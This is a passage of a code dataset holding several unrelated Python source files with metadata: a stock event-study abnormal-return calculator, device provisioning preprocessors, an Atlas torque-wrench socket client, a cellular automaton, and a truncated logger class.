pd.merge(ff_factor_df, df, right_index=True,\n left_index=True, how='inner')\n trading_days = df.index\n all_trading_days = trading_day_series.copy()\n\n if data.empty or trading_days[-1] < event_date:\n return np.nan, 'Not enough data'\n event_trading_date = all_trading_days[all_trading_days >= event_date].iloc[0]\n post_event_days = all_trading_days[all_trading_days > event_trading_date]\n before_event_days = all_trading_days[all_trading_days < event_trading_date]\n\n training_date_series = before_event_days.iloc[-210:-10]\n # start_date = before_event_days.iloc[-211]\n # data = data[data.index >= start_date]\n\n def get_detail_date(index):\n if index < 0:\n return before_event_days.iloc[index]\n else:\n return post_event_days.iloc[index - 1]\n\n event_start_date = get_detail_date(period_start_days)\n event_end_date = get_detail_date(period_end_days)\n data = data[data.index <= event_end_date]\n\n # data.loc[:, const.STOCK_RETURN] = data[const.CLOSE_PRICE].pct_change()\n\n testing_date_series = all_trading_days[all_trading_days >= event_start_date]\n testing_date_series = testing_date_series[testing_date_series <= event_end_date]\n\n real_training_date = trading_days[trading_days.isin(training_date_series)]\n real_testing_date = trading_days[trading_days.isin(testing_date_series)]\n\n if len(real_training_date) == 0 or len(real_testing_date) == 0:\n return np.nan, 'Not enough date to calculate'\n\n if len(real_training_date) <= 40:\n return np.nan, 'Not enough training data'\n\n # elif len(before_event_days) < 210:\n # training_data = data.loc[before_event_days[:-10]]\n #\n # else:\n # training_data = data.loc[before_event_days[-210:-10]]\n\n # event_start_date = get_detail_date(period_start_days)\n # event_end_date = get_detail_date(period_end_days)\n training_data = data.loc[real_training_date].dropna(subset=[const.STOCK_RETURN])\n testing_data = data.loc[real_testing_date, useful_col]\n\n try:\n # testing_data = data.loc[event_start_date:event_end_date, useful_col]\n olsmd = sm.OLS(training_data[const.STOCK_RETURN], training_data[useful_col])\n olsres = olsmd.fit()\n CAR = (data.loc[event_start_date:event_end_date, const.STOCK_RETURN] - olsres.predict(testing_data)).sum()\n\n return CAR, 'Calculation Succeed'\n\n except Exception as err:\n print(df.iloc[0])\n raise Exception(err)\n\n\nif __name__ == '__main__':\n # format fama french 3 factor (for record only)\n # ff_csv = pd.read_csv(os.path.join(const.DATA_PATH, 'F-F_Research_Data_Factors_daily.CSV'),\n # dtype={'date': str})\n # ff_csv['date'] = pd.to_datetime(ff_csv['date'])\n # ff_csv = ff_csv.set_index('date')\n #\n # mom_df = pd.read_csv(os.path.join(const.DATA_PATH, 'F-F_Momentum_Factor_daily.CSV'),\n # dtype={'date': str}).rename(index=str, columns={'Mom ': 'Mom'})\n # mom_df['date'] = pd.to_datetime(mom_df['date'])\n # mom_df = mom_df.set_index('date')\n #\n # ff_df = pd.merge(ff_csv, mom_df, left_index=True, right_index=True, how='inner')\n # ff_df.to_pickle(os.path.join(const.DATA_PATH, '20180201_ff_factor_path.pkl'))\n\n # format CRSP file (for record only)\n # crsp_df = pd.read_csv(os.path.join(const.DATA_PATH, 'cc_firm_data', '1986_2017_crsp_price_data.csv'),\n # usecols=['date', 'CUSIP', const.CLOSE_PRICE, 'TICKER', 'PERMNO'], dtype=str)\n # crsp_df = crsp_df.dropna(subset=['date'])\n # crsp_df.loc[:, 'date'] = pd.to_datetime(crsp_df['date'])\n # crsp_df.loc[:, const.CLOSE_PRICE] = pd.to_numeric(crsp_df[const.CLOSE_PRICE])\n # crsp_df = crsp_df.rename(index=str, columns={'CUSIP': const.CUSIP8, 'TICKER': const.TICKER})\n # crsp_df.to_pickle(os.path.join(const.DATA_PATH, 'cc_firm_data', '1986_2017_crsp_price_data.pkl'))\n print('Format crsp df')\n # crsp_df = pd.read_csv(os.path.join(const.DATA_PATH, 'cc_firm_data', '1986_2017_crsp_more_firm_info_data.csv'),\n # usecols=['date', 'CUSIP', const.STOCK_RETURN, 'TICKER', 'PERMNO'], dtype=str)\n # crsp_df = crsp_df.dropna(subset=[const.STOCK_RETURN], how='any')\n # crsp_df.loc[:, 'date'] = pd.to_datetime(crsp_df['date'])\n # crsp_df.loc[:, const.STOCK_RETURN] = pd.to_numeric(crsp_df[const.STOCK_RETURN], errors='coerce')\n # # crsp_df.loc[:, 'CFACPR'] = pd.to_numeric(crsp_df['CFACPR'], errors='coerce').fillna(1)\n # # crsp_df.loc[:, const.ADJUESTED_PRICE] = crsp_df[const.CLOSE_PRICE] / crsp_df['CFACPR']\n # crsp_df = crsp_df.rename(index=str, columns={'CUSIP': const.CUSIP8, 'TICKER': const.TICKER})\n # crsp_df.to_pickle(os.path.join(const.DATA_PATH, 'cc_firm_data', '20180205_1986_2017_crsp_price_data.pkl'))\n\n print('Load crsp file')\n crsp_df = pd.read_pickle(os.path.join(const.DATA_PATH, 'cc_firm_data', '20180205_1986_2017_crsp_price_data.pkl'))\n\n # start to calculate car\n print('Generate group')\n crsp_group = crsp_df.groupby('PERMNO')\n\n\n def format_crsp_df_and_calculate_car(df):\n # cusip = df.iloc[0][const.CUSIP8]\n permno = df.iloc[0]['PERMNO']\n tmp_df = df.copy()\n # try:\n # tmp_df.loc[:, 'date'] = pd.to_datetime(tmp_df['date'])\n tmp_df = tmp_df.set_index('date').sort_index(ascending=True)\n tmp_df.loc[:, const.STOCK_RETURN] = pd.to_numeric(tmp_df[const.STOCK_RETURN])\n # tmp_df = tmp_df.dropna(subset=[const.CLOSE_PRICE])\n\n # tmp_df.loc[:, const.CLOSE_PRICE] = tmp_df[const.CLOSE_PRICE].apply(abs)\n # tmp_df.loc[:, const.STOCK_RETURN] = stock_return_series\n tmp_df.to_pickle(os.path.join(const.DATA_PATH, 'cc_firm_data', 'crsp_permno_sep', '{}.pkl'.format(permno)))\n\n # stock_return_series = stock_return_series.dropna()\n result_df = pd.DataFrame(columns=[const.YEAR, const.CAR_1, const.CAR_3, const.CAR_4])\n # if stock_return_series.empty:\n # return result_df\n start_year = tmp_df.index[0].year\n if start_year == 1986:\n start_year += 1\n\n year_range = range(start_year, tmp_df.index[-1].year)\n for i in year_range:\n event_date = datetime.datetime(year=i, month=7, day=1)\n result_dict = {const.YEAR: i}\n\n has_value_flag = False\n\n for j in [1, 3, 4]:\n car_data, reason = car(tmp_df, event_date, j, -2, 2)\n if not np.isnan(car_data) and not has_value_flag:\n has_value_flag = True\n result_dict['{}_{}'.format(const.CAR, j)] = car_data\n\n if has_value_flag:\n result_df = result_df.append(result_dict, ignore_index=True)\n\n if result_df.empty:\n return pd.DataFrame()\n\n else:\n result_df.to_pickle(os.path.join(const.TEMP_PATH, 'temp_car_calculation', '{}.pkl'.format(permno)))\n return result_df\n\n\n def handle_data_frame(cusip_df):\n cusip = cusip_df[const.CUSIP8].dropna().iloc[0]\n # ticker = cusip_df.iloc[0][const.TICKER]\n promno = cusip_df.iloc[0]['PERMNO']\n return_df = format_crsp_df_and_calculate_car(cusip_df)\n if return_df.empty:\n return pd.DataFrame()\n else:\n return_df.loc[:, const.CUSIP8] = cusip\n return_df.loc[:, 'PERMNO'] = promno\n # return_df.loc[:, const.TICKER] = ticker\n # result_df_list.append(result_df)\n\n return return_df\n\n\n pool = pathos.multiprocessing.ProcessingPool(multiprocessing.cpu_count() - 3)\n # pool = multiprocessing.Pool(multiprocessing.cpu_count() - 3)\n\n print('Prepare multi processing')\n # cusip_list = list(set(crsp_df[const.CUSIP8]))\n # cusip_lists = np.array_split(cusip_list, multiprocessing.cpu_count() - 3)\n # cusip_dfs = [crsp_group.get_group(i) for i in cusip_list]\n permno_list = list(set(crsp_df['PERMNO']))\n # permno_lists = np.array_split(permno_list, multiprocessing.cpu_count() - 3)\n cusip_dfs = [crsp_group.get_group(i) for i in permno_list]\n # dfs_list = [[crsp_group.get_group(i) for i in j] for j in cusip_lists]\n\n print('start multi processing')\n result_dfs = pool.map(handle_data_frame, cusip_dfs)\n\n result_df = pd.concat(result_dfs, axis=0, ignore_index=True)\n\n print('Processing finished')\n result_df.to_pickle(os.path.join(const.TEMP_PATH, '20180204_crsp_car_calculation.pkl'))\n","sub_path":"new_project_file/step13_calculate_car_value.py","file_name":"step13_calculate_car_value.py","file_ext":"py","file_size_in_byte":9858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"152869256","text":"# -*- coding: utf-8 -*-\n\n\n'''\n 实现一个正整数的阶乘\n'''\n\n\ndef factorial(n):\n\tresult = n\n\n\tfor i in xrange(1, n):\n\t\tresult *= i\n\n\treturn result\n\n\nnumber = int(input(\"请输入一个正整数:\"))\nresult = factorial(number)\n\nprint(\"%d 的阶乘是%d\" % (number, result))\n","sub_path":"fishc/factorial_1.py","file_name":"factorial_1.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"271105673","text":"'''\nCreated on 25/02/2015\n\n:author: alfred\n'''\nfrom dirty_models.base import Unlocker\nfrom mc_be.commons.filter_list import FilterList, InList\nfrom mc_be.blueprints.dmm.device.filters import DeviceFilters\nfrom mc_be.blueprints.dmm.subscriber.services import subscriber_service\nfrom mc_be.commons.utils import get_attr_by_path\nfrom mc_be.blueprints.dmm.models import Links\nfrom mc_be.blueprints.dmm.box.services import box_provision_service\nfrom mc_be.blueprints.dmm.subscriptions.services import subscription_service\nfrom mc_be.blueprints.dmm.device.services import device_service\nfrom mc_be.blueprints.dmm.communications_module.services import communications_module_service\nfrom mc_be.blueprints.dmm.smip.validators import BoxProvisionPreValidate\nfrom mc_be.commons.services import ValidateError\n\n\nclass JobPreprocessor:\n\n params = {}\n\n def __init__(self, *args, **kwargs):\n if kwargs:\n self.params = kwargs\n\n def process(self, model):\n if not self.params:\n return\n operation_name = get_attr_by_path(model, 'request.name')\n if not isinstance(operation_name, str):\n return\n actions = get_attr_by_path(self.params, 'operations.' + operation_name, {})\n if not isinstance(actions, dict):\n return\n self._replace(model, actions)\n self._include(model, actions)\n self._exclude(model, actions)\n self._add(model, actions)\n self._remove(model, actions)\n\n def _add(self, model, actions):\n data = actions.get('add')\n if isinstance(data, dict):\n self._modify_model(model, data)\n\n def _remove(self, model, actions):\n fields = self._get_as_list(actions, 'remove')\n if isinstance(fields, list):\n self._modify_model(model, delete_fields=fields)\n\n def _include(self, model, actions):\n action_list = self._get_as_list(actions, 'include')\n if not action_list:\n return\n for action in action_list:\n parameter, data = self._get_data(model, action)\n if not isinstance(data, dict):\n return\n self._modify_model(model, data)\n\n def _exclude(self, model, actions):\n action_list = self._get_as_list(actions, 'exclude')\n if not action_list:\n return\n for action in action_list:\n parameter, fields = self._get_data(model, action)\n if not isinstance(fields, list):\n return\n self._modify_model(model, delete_fields=fields)\n\n def _replace(self, model, actions):\n action_list = self._get_as_list(actions, 'replace')\n if not action_list:\n return\n for action in action_list:\n parameter, data = self._get_data(model, action)\n if not isinstance(data, dict):\n return\n self._modify_model(model, data, delete_fields=[parameter])\n\n def _get_as_list(self, actions, option):\n action = actions.get(option)\n items = None\n if isinstance(action, (dict, str)):\n items = [action]\n elif isinstance(action, list):\n items = action\n return items\n\n def _get_data(self, model, action):\n if not isinstance(action.get('values'), dict):\n return None, None\n parameter = action.get('parameter')\n parameter_value = get_attr_by_path(model, 'request.parameters.{}'.format(parameter))\n if not isinstance(parameter_value, str):\n return None, None\n return parameter, action.get('values', {}).get(parameter_value)\n\n def _modify_model(self, model, data=None, delete_fields=None):\n with Unlocker(model):\n parameters = get_attr_by_path(model, 'request.parameters')\n if isinstance(delete_fields, list):\n for field in delete_fields:\n parameters.delete_attr_by_path(field)\n if data:\n parameters.import_data(data)\n\n\nclass DevicePreprocessor:\n\n def process(self, model):\n if not model.id:\n return\n\n with Unlocker(model):\n if not model.provision.custom_id:\n model.provision.custom_id = [model.id]\n\n if not model.provision.name:\n model.provision.name = [model.id]\n\n if not model.provision.description:\n model.provision.description = [model.id]\n\n\nclass ComModPreprocessor:\n\n def process(self, model):\n\n if not model.provision:\n return\n\n id = None\n if model.provision.imei and len(model.provision.imei) and model.provision.imei[0]:\n id = model.provision.imei[0]\n elif model.provision.mac_address and len(model.provision.mac_address) and model.provision.mac_address[0]:\n id = model.provision.mac_address[0].replace(':', '_')\n\n if id:\n with Unlocker(model):\n if not model.id:\n model.id = id\n if not model.provision.custom_id:\n model.provision.custom_id = [id]\n\n if not model.provision.name:\n model.provision.name = [id]\n\n if not model.provision.description:\n model.provision.description = [id]\n\n\nclass BoxPreprocessor:\n\n IMSI_NOT_RELATED = 'imsiNotRelated'\n IMSI_NOT_RELATED_MESSAGE = \"IMSI '{0}' not related to any ICC.\"\n\n ICC_NOT_RELATED = 'iccNotRelated'\n ICC_NOT_RELATED_MESSAGE = \"ICC '{0}' not related to any IMSI.\"\n\n def get_related_sim_info(self, model):\n \"\"\"\n Returns subscribers and subscriptions ids. If any imsi or icc is not found, raises ValidationError\n \"\"\"\n\n def raise_imsi_error(path, imsi):\n raise ValidateError(errors={path: {self.IMSI_NOT_RELATED: self.IMSI_NOT_RELATED_MESSAGE.format(imsi)}})\n\n def raise_icc_error(path, icc):\n raise ValidateError(errors={path: {self.ICC_NOT_RELATED: self.ICC_NOT_RELATED_MESSAGE.format(icc)}})\n\n def get_imsis_from_relation(item):\n relation_imsis = set()\n imsis_data = get_attr_by_path(item, 'provision.imsi')\n if imsis_data:\n relation_imsis = relation_imsis.union(set(imsis_data))\n imsis_data = get_attr_by_path(item, 'collection.inventory.imsiInfo')\n if imsis_data:\n relation_imsis = relation_imsis.union(set([get_attr_by_path(imsi, 'data.imsi')\n for imsi in imsis_data if imsi.get('data',\n {}).get('imsi')]))\n return relation_imsis\n\n def look_for_imsis_and_raise(imsis):\n if not model.subscriptions:\n return\n for a in range(len(model.subscriptions)):\n subscription = model.subscriptions[a]\n for i in range(len(subscription.provision.imsi)):\n imsi = subscription.provision.imsi[i]\n if imsi in imsis:\n raise_imsi_error('.'.join(['subscriptions', str(a), 'provision.imsi', str(i)]), imsi)\n\n def look_for_iccs_and_raise(iccs):\n if not model.subscribers:\n return\n for a in range(len(model.subscribers)):\n subscriber = model.subscribers[a]\n for i in range(len(subscriber.provision.icc)):\n icc = subscriber.provision.icc[i]\n if icc in iccs:\n raise_icc_error('.'.join(['subscribers', str(a), 'provision.icc', str(i)]), icc)\n\n iccs = set()\n imsis = set()\n\n found_iccs = set()\n found_imsis = set()\n\n try:\n for subscriber in model.subscribers:\n iccs = iccs.union(set(subscriber.provision.icc))\n for subscription in model.subscriptions:\n imsis = imsis.union(set(subscription.provision.imsi))\n except:\n pass\n\n if not iccs:\n look_for_imsis_and_raise(imsis)\n return [], []\n\n if not imsis:\n look_for_iccs_and_raise(iccs)\n return [], []\n\n # Get the whole information for subscribers to check that they have related imsis\n filter_list = FilterList([InList(filter_name=DeviceFilters.PROV_ICC, value=list(iccs))])\n subscribers = subscriber_service.list_all(filter_list)\n\n subscribers_ids = set()\n subscriptions_ids = set()\n for subscriber in subscribers:\n # Save subscriber on cache\n final_key = subscriber_service.cache.get_cache_key(subscriber.id)\n subscriber_service.cache.save(final_key, subscriber, [subscriber.id])\n subscribers_ids.add(subscriber.id)\n\n iccs_data = get_attr_by_path(subscriber, 'provision.icc')\n if iccs_data:\n found_iccs = found_iccs.union(set(iccs_data))\n\n iccs_data = get_attr_by_path(subscriber, 'collection.inventory.icc')\n if iccs_data:\n found_iccs = found_iccs.union(set([get_attr_by_path(icc, 'data')\n for icc in iccs_data if icc.get('data')]))\n\n relations = get_attr_by_path(subscriber, 'provision.relation')\n for relation in relations:\n if not relation.subscription:\n continue\n\n for subscription in relation.subscription:\n subscriptions_ids.add(get_attr_by_path(subscription, 'id'))\n found_imsis = found_imsis.union(get_imsis_from_relation(subscription))\n\n relations = get_attr_by_path(subscriber, 'collection.relation')\n for relation in relations:\n subscriptions = get_attr_by_path(relation, 'data.subscription')\n if not subscriptions:\n continue\n\n for subscription in subscriptions:\n subscriptions_ids.add(get_attr_by_path(subscription, 'id'))\n found_imsis = found_imsis.union(get_imsis_from_relation(subscription))\n\n missing_iccs = iccs.difference(found_iccs)\n if missing_iccs:\n look_for_iccs_and_raise(missing_iccs)\n\n missing_imsis = imsis.difference(found_imsis)\n if missing_imsis:\n look_for_imsis_and_raise(missing_imsis)\n\n return subscribers_ids, subscriptions_ids\n\n def _fill_relations(self, model):\n device_type = Links.ENTITY_TYPE_DEVICE\n\n model.relations = []\n\n for comm_mod in model.communications_modules:\n relation = box_provision_service.build_initial_relation_model({'links': [{'entityType': device_type,\n 'id': model.device.id}]})\n\n relation.links.append({'entityType': Links.ENTITY_TYPE_COMMS_MODULE,\n 'id': comm_mod.id})\n model.relations.append(relation)\n\n def process(self, model):\n if model.device:\n device_service.preprocess_model(model.device)\n\n if model.subscribers:\n for subscriber in model.subscribers:\n subscriber_service.preprocess_model(subscriber)\n\n if model.subscriptions:\n for subscription in model.subscriptions:\n subscription_service.preprocess_model(subscription)\n\n if model.communications_modules:\n for communications_module in model.communications_modules:\n communications_module_service.preprocess_model(communications_module)\n\n # 2. Fill relations\n if not model.relations:\n self._fill_relations(model)\n\n box_provision_service.validate(model, validator=BoxProvisionPreValidate())\n\n # 3. Delete subscribers and subscriptions\n del model.subscribers\n del model.subscriptions\n","sub_path":"mc-pybe-release-smip-R4/mc_be/blueprints/dmm/smip/preprocessors.py","file_name":"preprocessors.py","file_ext":"py","file_size_in_byte":11974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"299887750","text":"import ast\nimport csv\nimport json\nimport os\nimport socket\nimport sys\nimport time\nfrom array import array\n\nCSV_PATH = '/home/siemens/workspace/danfoss_atlas_wrench_datalog.csv'\nHEADER_LIST = ['Time Stamp', 'Parameter Set ID', 'Tightening Status', 'Torque', 'Angle']\nRECV_DATA_LENGTH = 1024\nTIME_OUT_ATLAS = 50\nRETRY_COUNTER = 5\nIP_DEFAULT = \"192.168.1.98\"\nPORT_DEFAULT = 4545\n\n# atlas application message ID\nMID0001_COMM_START = '00200001003000000000' # Application Communication start\nMID0003_COMM_STOP = '00200003001000000000' # Application Communication stop\nMID0018_SELECT_PSET = '00230018001000000000' # Select Parameter set (header+ID)\nMID0040_TOOL_DATA = '00200040002000000000' # Tool data upload request\nMID0060_TIGHT_RESU_SUBS = '00200060001100000000' # Last tightening result data subscribe\nMID9999_KEEP_ALIVE = '00209999000000000000' # Keep alive open protocol communication\n\nMID0061_TIGHT_RESU_CODE = '0061' # Last tightening result data\nMID0004_NEG_ACK_CODE = '0004' # Application Communication negative acknowledge\nMID9999 = '9999'\nKEEP_ALIVE_TIME_MAX = 10\nKEEP_ALIVE_RECV_DELAY = 4\nMID_CMD_SEND_DELAY = 1\n\n# byte number of MID9999 receive data\nHEADER_MID_START = 4\nHEADER_MID_END = 8\nDATA_MID_START = 25\nDATA_MID_END = 29\nPARA_SET_ID_START = 111\nPARA_SET_ID_END = 113\nTIGHT_STATUS_START = 128\nTIGHT_STATUS_END = 129\nTORQUE_START = 161\nTORQUE_END = 167\nANGLE_START = 190\nANGLE_END = 195\nTIME_STAMP_START = 197\nTIME_STAMP_END = 216\nPSET_DICT_DEFAULT = '{\"Pset\":\"002\"}'\n\n#TODO IP, Port shall be refactored to read from _device\n#Input Port: pset\ndef SPIDR_FB_Main(IP, Port, pset):\n\n #TODO This part shall be refactored to SPIDR implementation\n ip_socket = IP\n port_socket = int(Port)\n\n pset_dict[\"Pset\"] = pset\n\n client = AtlasClient(ip_socket, port_socket)\n client.start_comm()\n client.select_pset(pset_dict)\n client.tighten_result_subscribe()\n time.sleep(4)\n data = client.keep_alive()\n time.sleep(2)\n\n if len(data) < 1 or data is None:\n print(\"- ERROR: read atlas tightening resule data error\")\n else:\n print(\"- OK: log data\")\n check_log_file()\n print(\"- KK: log data 1111\")\n log_data(data)\n\n client.stop_comm()\n\n status = 0x00000000\n\n #Output Port: status\n return (status)\n\ndef check_log_file():\n print(\"- check log file existed or setup a new csv file\")\n\n # check the csv file and write the header\n if not os.path.exists(CSV_PATH):\n with open(CSV_PATH, 'w', encoding='utf-8') as f:\n header = HEADER_LIST\n csvwriter = csv.writer(f)\n csvwriter.writerow(header)\n f.close\n\ndef log_data(recv_data):\n print(\"- log data start\")\n print(\"- input data: %s, type: %s\" % (recv_data, type(recv_data)))\n\n # data extraction\n time_stamp_recv = recv_data[TIME_STAMP_START : TIME_STAMP_END]\n parameter_set_id_recv = recv_data[PARA_SET_ID_START : PARA_SET_ID_END]\n tightening_status_recv = recv_data[TIGHT_STATUS_START : TIGHT_STATUS_END]\n torque_recv = recv_data[TORQUE_START : TORQUE_END]\n angle_recv = recv_data[ANGLE_START : ANGLE_END]\n \n data_log = [time_stamp_recv, parameter_set_id_recv, tightening_status_recv, \n torque_recv, angle_recv]\n\n # write data to csv file\n with open (CSV_PATH, 'a', encoding='utf-8', newline='') as f:\n csvwriter = csv.writer(f)\n csvwriter.writerow(data_log)\n f.close\n print(\"- log data to csv file\")\n #return ()\n\n\n#@singleton\nclass AtlasClient(object):\n def __init__(self, ip=IP_DEFAULT, port =PORT_DEFAULT):\n counter = RETRY_COUNTER\n while counter > 0:\n counter -= 1\n try:\n self.sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error as msg:\n self.sk = None\n continue\n\n try:\n self.sk.connect((ip, port))\n print(\"--socket connect\")\n self.sk.settimeout(TIME_OUT_ATLAS)\n except socket.error as msg:\n self.sk.close()\n self.sk = None\n continue\n break\n\n def start_comm(self):\n mid_send = MID0001_COMM_START + chr(0)\n counter = RETRY_COUNTER\n while counter > 0:\n counter -= 1\n try:\n self.sk.sendall(mid_send.encode())\n print(\"--socket start communication\")\n data = self.sk.recv(RECV_DATA_LENGTH)\n data = data.decode()\n print(\"- start comm recv data: %s type: %s\" % (data, type(data)))\n mid_recv = data[HEADER_MID_START : HEADER_MID_END]\n print(\"- mid0001 feedback mid code\", mid_recv)\n if data is None :\n print(\"- ERROR: start communicaton feedback error\", mid_recv)\n #return None\n #return data.decode('utf-8')\n except socket.error as msg:\n print(msg)\n continue\n break\n\n def select_pset(self, pset_dict):\n pset_dict = json.loads(pset_dict)\n mid_send = MID0018_SELECT_PSET + pset_dict[\"Pset\"] + chr(0)\n counter = RETRY_COUNTER\n while counter > 0:\n counter -= 1\n try:\n self.sk.sendall(mid_send.encode())\n print(\"--socket select pset\")\n data = self.sk.recv(RECV_DATA_LENGTH)\n data = data.decode()\n print(\"- select pset recv data: %s\" % data)\n mid_recv = data[HEADER_MID_START : HEADER_MID_END]\n print(\"- mid0001 feedback mid code\", mid_recv)\n if len(data) < 1 or data is None:\n #return None\n print(\"- ERROR: select pset feedback error\", mid_recv)\n except socket.error as msg:\n print(msg)\n continue\n break\n\n def tighten_result_subscribe(self):\n mid_send = MID0060_TIGHT_RESU_SUBS + chr(0)\n counter = RETRY_COUNTER\n while counter > 0:\n counter -= 1\n try:\n self.sk.sendall(mid_send.encode())\n print(\"--socket tighten resulte subscribe\")\n data = self.sk.recv(RECV_DATA_LENGTH)\n data = data.decode()\n print(\"- select tighten recv data: %s\" % data)\n mid_recv = data[HEADER_MID_START : HEADER_MID_END]\n print(\"- mid0001 feedback mid code\", mid_recv)\n if len(data) < 1 or data is None:\n #return None\n print(\"- ERROR: tighten subscribe feedback error\", mid_recv)\n #self.keep_alive()\n except socket.error as msg:\n print(msg)\n continue\n break\n\n def keep_alive(self):\n mid_send = MID9999_KEEP_ALIVE + chr(0)\n counter = RETRY_COUNTER\n keep_alive_time = KEEP_ALIVE_TIME_MAX\n mid_recv = \"9999\"\n\n while counter > 0:\n counter -= 1\n try:\n while (mid_recv != MID0061_TIGHT_RESU_CODE):\n keep_alive_time -= 1\n self.sk.sendall(mid_send.encode())\n time.sleep(KEEP_ALIVE_RECV_DELAY)\n print(\"- keep alive loop start\")\n\n data = self.sk.recv(RECV_DATA_LENGTH)\n print(\"- mid9999 feedback data: %s, type: %s\" % (data, type(data)))\n data = data.decode()\n if len(data) < 1 or data is None:\n print(\"- ERROR: tighten subscribe feedback error\", mid_recv)\n return None\t\t\t\t\t\n\t\t\t\t\t\n mid_recv = data[DATA_MID_START : DATA_MID_END]\n print(\"- mid_recv[25:29]: %s, type: %s\" % (mid_recv, type(mid_recv))) \n if (mid_recv == MID0004_NEG_ACK_CODE):\n print(\"- ERROR: Error, code: \", mid_recv )\n return None\n\n if keep_alive_time < 1 :\n print(\"- ERROR: over the Max keep alive time\")\n return None\t\n\t\t\t\t\t\t\n print(\"## mid9999 feedback mid recv:%s, type:%s \" % (mid_recv, type(mid_recv)))\n print(\"- keep alive loop end\")\n\n return(data)\n\t\t\n except socket.error as msg:\n print(msg)\n continue\n break\t\t\n\n def stop_comm(self):\n mid_send = MID0003_COMM_STOP + chr(0)\n counter = RETRY_COUNTER\n while counter > 0:\n counter -= 1\n try:\n self.sk.sendall(mid_send.encode())\n print(\"--socket stop communication\")\n data = self.sk.recv(RECV_DATA_LENGTH)\n data = data.decode()\n print(\"- stop comm recv data: %s\" % data)\n mid_recv = data[HEADER_MID_START : HEADER_MID_END]\n print(\"- mid0001 feedback mid code\", mid_recv)\n if data is None :\n print(\"- ERROR: stop communicaton feedback error\", mid_recv)\n #return None\n #return data.decode('utf-8')\n except socket.error as msg:\n print(msg)\n continue\n break\n\n self.sk.close()\n print(\"--socket close\")\n self.sk = None\n\n\n#TODO This part shall be refactored to SPIDR implementation\nif __name__ == \"__main__\":\n SPIDR_FB_Main(IP_DEFAULT, PORT_DEFAULT)\n","sub_path":"creem/instance/_Reference/FBImport/Atlas.TorqueWrenchSkill.ScrewFastening.py","file_name":"Atlas.TorqueWrenchSkill.ScrewFastening.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"312001909","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nuniverse = {\"born\": [], \\\n \"live\": [], \\\n \"grid\": None \\\n }\n \n\ndef pad_to_2d(kernel, dims):\n\n mid_x = dims[0] // 2\n mid_y = dims[1] // 2 \n mid_k_x = kernel.shape[0] // 2\n mid_k_y = kernel.shape[1] // 2\n \n start_x = mid_x - mid_k_x\n start_y = mid_y - mid_k_y\n \n padded = np.zeros(dims)\n padded[mid_x-mid_k_x:mid_x-mid_k_x + kernel.shape[0],\n mid_y-mid_k_y:mid_y-mid_k_y + kernel.shape[1]] = kernel\n \n return padded\n\ndef ft_convolve(grid, kernel):\n\n grid2 = grid\n if np.shape(kernel) != np.shape(grid2):\n padded_kernel = pad_to_2d(kernel, grid2.shape)\n else:\n padded_kernel = kernel\n\n convolved = np.round(np.fft.ifftshift(np.abs(np.fft.ifft2(\\\n np.fft.fft2(np.fft.fftshift(grid2)) \\\n * np.fft.fft2(np.fft.fftshift(padded_kernel))))))\n\n return convolved \n\ndef ca_update(grid, rules):\n\n kernel = np.ones((3,3))\n kernel[1,1] = 0\n\n moore_grid = ft_convolve(grid, kernel)\n\n new_grid = np.zeros_like(grid)\n\n \n for birth in rules[0]:\n new_grid[((moore_grid == birth) * (grid == 0))] = 1\n\n for survive in rules[1]:\n new_grid[((moore_grid == survive) * (grid == 1))] = 1\n\n return new_grid\n\ndef ca_steps(universe, steps):\n\n for step in range(steps):\n\n universe[\"grid\"] = ca_update(universe[\"grid\"], [universe[\"born\"], universe[\"live\"]])\n\n\n return universe\n\nif __name__ == \"__main__\":\n\n obs_dim = 64\n universe[\"born\"] = [3]\n universe[\"live\"] = [2,3]\n\n universe[\"grid\"] = np.zeros((obs_dim, obs_dim))\n \n universe[\"grid\"][34, 32] = 1\n universe[\"grid\"][35, 32:34] = 1\n universe[\"grid\"][36, 31] = 1\n universe[\"grid\"][36, 33] = 1\n\n plt.figure()\n plt.imshow(universe[\"grid\"])\n\n\n universe = ca_steps(universe, 1)\n\n\n plt.figure()\n plt.imshow(universe[\"grid\"])\n\n universe = ca_steps(universe, 1)\n\n\n plt.figure()\n plt.imshow(universe[\"grid\"])\n universe = ca_steps(universe, 1)\n\n\n plt.figure()\n plt.imshow(universe[\"grid\"])\n plt.show()\n\n","sub_path":"src/life_like.py","file_name":"life_like.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"420224733","text":"from __future__ import absolute_import\nimport sys\nimport time\nimport datetime\nimport six\nfrom threading import Timer\n\nclass GeneralLogger(object):\n def __init__(self, logFD=None, job_backend=None, error=False):\n self.error = error\n self.job_backend = job_backend\n self.buffer = ''\n self.last_timer = None\n self.last_messages = ''\n\n self.terminal = sys.__stdout__ if error is False else sys.__stderr__\n self.logFD = logFD\n\n def get_time(self):\n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n\n return st + '.' + str(ts % 1)[2:6]\n\n def get_line(self, line):\n if line:\n return \"[%s] %s\\n\" % (self.get_time(), line)\n\n return line\n\n def fileno(self):\n return sys.__stdout__.fileno() if self.error is False else sys.__stderr__.fileno()\n\n def flush(self):\n if self.logFD:\n self.logFD.flush()\n\n self.terminal.flush()\n\n def send_to_buffer(self):\n self.last_timer = None\n\n if self.buffer:\n if self.logFD:\n self.logFD.write(self.buffer)\n\n if self.job_backend and self.job_backend.running:\n self.job_backend.write_log(self.buffer)\n\n self.buffer = ''\n\n def write(self, message):\n\n # if message == '\\n':\n # return\n\n message = six.text_type(message)\n\n # if not self.error:\n # message = self.get_line(message)\n\n try:\n self.terminal.write(message)\n\n self.last_messages += message\n if len(self.last_messages) > 500 * 1024:\n self.last_messages = self.last_messages[-500 * 1024:]\n\n for char in message:\n if '\\b' == char:\n self.buffer = self.buffer[:-1]\n else:\n self.buffer += char\n except:\n self.last_messages = ''\n self.buffer = ''\n pass\n\n if not self.last_timer:\n self.last_timer = Timer(1.0, 